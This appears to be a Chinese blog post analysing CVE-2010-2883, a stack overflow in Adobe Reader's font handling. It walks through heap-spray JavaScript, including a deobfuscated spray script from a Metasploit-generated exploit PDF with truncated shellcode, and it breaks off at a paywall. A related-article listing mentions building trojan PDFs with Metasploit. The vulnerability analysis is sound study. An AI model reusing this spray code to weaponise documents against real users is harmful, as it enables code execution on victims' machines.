CVE-2010-2883分析

最新推荐文章于 2024-01-12 20:46:58 发布
VIP文章 最新推荐文章于 2024-01-12 20:46:58 发布
阅读量2.3k 收藏 5
点赞数 3
分类专栏: 漏洞分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangtiankuo/article/details/82994280
版权

1 漏洞背景

CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。

1.1 Heap Spray(堆喷)

使用堆喷的时候,会将EIP指向堆区的0x0C0C0C0C位置,然后用JavaScript申请大量内存,用包含着0x90和shellcode的“内存片”覆盖这些内存。

JavaScript会从内存低址向高址分配内存,申请了超过200M的内存。

 

var nop=unescape(“%u9090%u9090”);
//nop.length返回的是2
//产生一个大小为1MB且全部被0x90填满的内存块
while (nop.length<=0x100000/2)//0x100000是1MB,1MB=1024KB =1024*1024B=0x100000B
{
	nop+=nop;
}
//Java会为申请到的内存填上一些额外的信息,为了保证内存片恰好是1MB,需要将额外信息所占空间减去。
nop=nop.substring(0,0x100000/2-32/2-shellcode.length/2-2/2);
var slide=new Arrary();
//用200个nop+shellcode的内存片覆盖堆内存,只要任意一篇nop区能覆盖0x0C0C0C0C,攻击便可以成功。1MB的内存相对于200Bytes的shellcode,可以让exploit拥有足够的稳定性。
for (var i=0;i<200;i++)
{
	slide[i]=nop+shellcode;
}

 

 

1.2 PDF中的JS

注:使用的pdf是用metasploit生成的cve-2010-2883漏洞利用文档test.pdf

使用PDFStreamDumper查看PDF文件结构。

 第11个obj是OpenAction,文件打开时会执行它里边的脚本。

 然而第11个obj没有JS脚本,个人推测JS后面跟了个“12 0 R”代表脚本在第12个obj里面。

 JS脚本用了很多字符串来混淆,用简单字符代替后得到如下代码:

var shellcode = unescape( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a......' );
var str = unescape("%u0c0c%u0c0c");
while (str.length + 20 + 8 < 65536) //65536 Bytes=64MB
	str+=str;
//取从0-1524,1M多一点
str1 = str.substring(0, (0x0c0c-0x24)/2);
str1 += shellcode;
str1 += str;
str2 = str1.substring(0, 65536/2);
while(str2.length < 0x80000) 
	str2 += str2;
str3 = str2.substring(0, 0x80000 - (0x1020-0x08) / 2);
var str4 = new Array();
for (str5=0;str5
最低0.47元/天 解锁文章
wangtiankuo
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2020-2883.py
03-02
CVE-2020-2883.py
CVE-2010-2883漏洞分析
weixin_46286477的博客
09-28 989
CVE-2010-2883漏洞分析,从基础开始学习漏洞。
漏洞复现-CVE-2010-2883
滕财然的博客
02-26 1420
CVE-2010-2883 Adobe Reader复现 1、漏洞原理 Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞,用户打开了特制的PDF文件可能导致执行恶意代码,可实现比如进行远程控制等。 2、漏洞分析 反汇编工具IDA: IDA 是全球最智能、功能最完善的交互式反汇编程序,许多软件安全专家和黑客...
CVE-2010-2883 从漏洞分析到样本分析
qq_28205153的博客
08-19 4328
本文章将从漏洞利用分析开始,到样本分析结束,其中涉及到的知识点有PDF格式、TTF字体格式、缓冲区溢出漏洞利用、PE文件格式、软件脱壳和恶意代码分析。其中会演示一些基本操作,方便初学者进行复现。 前置知识 要学习本文章,需要下面的前置知识 C语言。可以看《C程序设计语言》。 汇编语言。可以看《深入理解计算机系统》第三章。 缓冲区溢出漏洞利用。可以看《0day安全:软件漏洞分析技术》。 软件脱壳、PE文件格式。可以看《加密与解密》。 恶意代码分析(可选)。可以看《恶意代码分析实战》。 漏洞信息 漏洞名称:
[漏洞战争]漏洞复现:CVE-2010-2883Adobe Reader TTF字体SING表栈溢出漏洞
最新发布
m0_51246873的博客
01-12 830
[漏洞战争]漏洞复现:CVE-2010-2883Adobe Reader TTF字体SING表栈溢出漏洞
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
CVE_2020_2546:CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3有效负载利用poc python3,
03-20
推特: 1,Weblogic RCE漏洞利用CVE_2020_2546 CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic RCE T3有效载荷利用POC python3 2,利用GIOP +发送绑定(CVE-2020-...
CVE-2010-2883字体文件SING表栈溢出
07-03
CVE-2010-2883字体文件SING表栈溢出,CVE-2010-2883字体文件SING表栈溢出
CVE-2010-2883:基于样本分析 PDF SING表字符溢出漏洞
CuiXY's Blog
02-01 251
0x01
漏洞分析CVE-2010-2883(栈溢出)
4ct10n
07-02 3092
Adobe Acrobat和Reader都是美国Adobe公司开发的非常流行的PDF文件阅读器。 基于Window和Mac OS X的Adobe Reader和Acrobat 9.4之前的9.x版本,8.2.5之前的8.x版本的CoolType.dll中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助带有TTF字体Smart INdependent Glyphlets (SING)表格中超长字段的PDF文
Adobe Reader栈溢出漏洞(CVE-2010-2883)分析
鬼手的博客
06-08 2355
文章目录漏洞描述测试环境静态分析定位触发点分析漏洞成因动态调试获取SING表的入口地址溢出点精心挑选的返回地址JavaScript实现HeapSpray利用ROP链绕过DEP保护漏洞利用流程总结漏洞修复参考资料 这个漏洞是《漏洞战争》里面的第一个漏洞,也是我分析的第一个漏洞。水平有限,如有错误还望各位大佬指正。 漏洞描述 CVE-2010-2883是Adobe Reader和Acrobat中的Co...
Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告
君子谬
11-28 2039
一. 简介   软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:
利用CVE-2010-2883漏洞制作pdf马
sky
06-18 1212
利用CVE-2010-2883漏洞制作pdf马   msf > searchCVE-2010-2883    exploit/windows/browser/adobe_cooltype_sing     2010-09-07       great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow   exploit
一个利用 CVE-2010-2883 漏洞的样本的简要分析
weixin_30596165的博客
09-14 145
拿到一个 CVE-2010-2883 的样本: file md5: 68F74C7272BF25B3592F9E46997779E2 file size: 763,188 bytes 这是一个 PDF 文件,其中包含很多的 stream,前面的 FlateDecode 编码的 stream 基本上都是一样的。 最后一个是有害的 ttf 文件,下图是解码前的 stream 结构:...
漏洞丨CVE20102883
m0_64973256的博客
03-31 263
这个Exp的编写用了很多技术,包括利用了PDF文件可执行js代码的特性,然后使用栈溢出劫持运行流程到icucnv36.dll,这个模块没有ASLR保护,然后再通过ROP链,各种寄存器布置,然后新建文件,又将文件映射到内存,再把shellcode拷贝到这块区域。参考链接:http://static.anquanke.com/download/b/security-geek-2019-q2/article-12.html。
栈溢出CVE复现分析CVE-2010-2883
weixin_40306105的博客
05-03 856
1 实验环境 操作系统:XP SP3 调试器:OllyDbg 反汇编:IDA Pro 7.0 Adobe Reader : 9.3.4 2 漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。 3 实验内容 首先在系统中找到问题库文件,也就是xp sp3...
CVE-2010-3972
03-14
这是一个关于计算机安全漏洞的问题,我可以回答。CVE-2010-3972是一个影响Adobe Reader和Acrobat的漏洞,可以允许攻击者执行任意代码。Adobe已经发布了修补程序来解决这个漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值